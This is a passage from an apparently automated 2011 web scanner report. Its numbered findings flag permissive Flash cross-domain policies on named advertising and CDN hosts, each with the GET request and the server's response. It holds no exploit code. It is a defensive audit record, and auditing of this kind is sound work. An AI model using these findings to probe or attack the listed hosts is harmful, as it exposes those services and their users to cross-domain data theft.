Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.22. http://bannerfarm.ace.advertising.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bannerfarm.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bannerfarm.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 26 Jan 2010 21:16:56 GMT
ETag: "608a9f-51-47e17ce388200"
Accept-Ranges: bytes
Content-Length: 81
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:05:27 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.23. http://beacon.videoegg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.videoegg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.videoegg.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:04:05 GMT
Server: Apache/2.2.16 (Debian)
Content-Length: 144
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

7.24. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729061000"
Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 03:58:55 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.25. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2893
Date: Sun, 04 Sep 2011 03:59:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.26. http://cas.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:57:03 GMT
Expires: Wed, 29 Aug 2012 03:57:03 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.27. http://cdn.media.innity.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.media.innity.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.media.innity.net

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 03:13:19 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 09:27:46 GMT
ETag: "2c84d-d5-49eaa462fa880"
Accept-Ranges: bytes
Content-Length: 213
Content-Type: application/xml
X-Cache: MISS from cdce-dal003-001.dal003.internap.com
X-Cache: MISS from cdce-dal003-002.dal003.internap.com
Via: 1.1 cdce-dal003-001.dal003.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-dal003-002.dal003.internap.com:80 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-d
...[SNIP]...

7.28. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 02:41:22 GMT
Date: Sun, 04 Sep 2011 02:41:22 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.29. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.30. http://clk.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

7.31. http://core.videoegg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.videoegg.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "af5f896ec6f317d2d7257811ce10f2f2:1218664532"
Last-Modified: Wed, 13 Aug 2008 21:55:32 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:03:46 GMT
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

7.32. http://d.tradex.openx.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:16 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "130e07-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.33. http://d13.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d13.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sun, 04 Sep 2011 02:41:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.34. http://d2.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d2.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d2.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Sun, 04 Sep 2011 02:43:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.35. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sun, 04 Sep 2011 02:37:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.36. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5510
Date: Sun, 04 Sep 2011 02:31:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.37. http://dis.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 04 Sep 2011 04:00:42 GMT
Expires: Wed, 29 Aug 2012 04:00:42 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.38. http://dis.sv.us.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.sv.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.sv.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:57:40 GMT
Expires: Wed, 29 Aug 2012 03:57:40 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.39. http://dp.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:51 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 21:37:22 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.40. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1b47"
Server: Microsoft-IIS/6.0
X-Server: D2H.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sun, 04 Sep 2011 10:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 10:59:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

7.41. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:39:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.42. http://http.tidaltv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://http.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: http.tidaltv.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "e096eb838427f28d1728b4ab67df906f:1294261663"
Last-Modified: Wed, 05 Jan 2011 21:07:43 GMT
Accept-Ranges: bytes
Content-Length: 76
Content-Type: application/xml
Date: Sun, 04 Sep 2011 03:20:06 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.43. http://i.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:25 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 dfw175165010000 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

7.44. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 02:37:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 02:37:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.45. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 03:59:23 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.46. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

7.47. http://load.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-412213234"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sun, 04 Sep 2011 02:36:37 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

7.48. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:40:46 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.49. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:50 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19956
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.50. http://media2.legacy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

7.51. http://nai.btrll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nai.btrll.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:09 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 08 Aug 2011 19:03:54 GMT
ETag: "270012-10d-1bbf7a80"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.52. http://oas.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
